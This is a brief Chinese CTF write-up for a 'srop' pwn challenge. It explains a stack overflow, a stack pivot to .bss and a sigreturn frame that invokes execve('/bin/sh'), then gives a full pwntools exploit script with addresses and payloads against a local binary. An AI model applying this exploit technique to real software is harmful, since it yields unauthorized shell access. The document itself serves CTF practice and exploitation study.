NewStatCTF–week3-pwn srop
主函数只有一个输出,一个输入,存在栈溢出
存在syscall函数,没有适当的可以改rdx的
别提ret2csu,太麻烦了所以用srop(而且题目就叫srop)
先改了rbp,然后跳转到主函数的这里
payload = b'A'*(0x30)+p64(bss_addr)+p64(main_addr)
- 可以往下不可以往上,为什么详见上一篇的栈迁移
然后输入就相当于在bss里输入了,但为什么不用额外找leave ret呢
–因为main函数最后又有一次leave ret
然后看代码
payload=b'/bin/sh\x00'+b'A'*(0x30)+p64(pop_rdi)+p64(0xf)+p64(syscall_addr)+bytes(frame)
跳转回到了bss_addr+8的位置
也就刚好是pop_rdi,然后进行srop打execve。
至于为什么要给rsp设置一个可读的地址,看下图,需要将地址为rsp+8位置存的数据赋给r9,如果不可读的话,就会访问错误。
总结:喵喵喵喵 出的太妙了
exp:
from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./pwn_1')
#p=remote('',)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda :p.recvline()
sys_addr = 0x401136
pop_rdi = 0x0000000000401203
pop_rsi_r15 = 0x0000000000401201
leave_ret = 0x401191
bss_addr = 0x404900
syscall_addr = 0x401040
main_addr = 0x401151
bin_sh = bss_addr-0x30
frame = SigreturnFrame()
frame.rdi = 59
frame.rsi = bin_sh
frame.rdx = 0
frame.rcx =0
frame.rsp= bss_addr
frame.rip =syscall_addr
payload = b'A'*(0x30)+p64(bss_addr)+p64(main_addr)
#gdb.attach(p)
sd(payload)
payload=b'/bin/sh\x00'+b'A'*(0x30)+p64(pop_rdi)+p64(0xf)+p64(syscall_addr)+bytes(frame)
gdb.attach(p)
sd(payload)
p.interactive()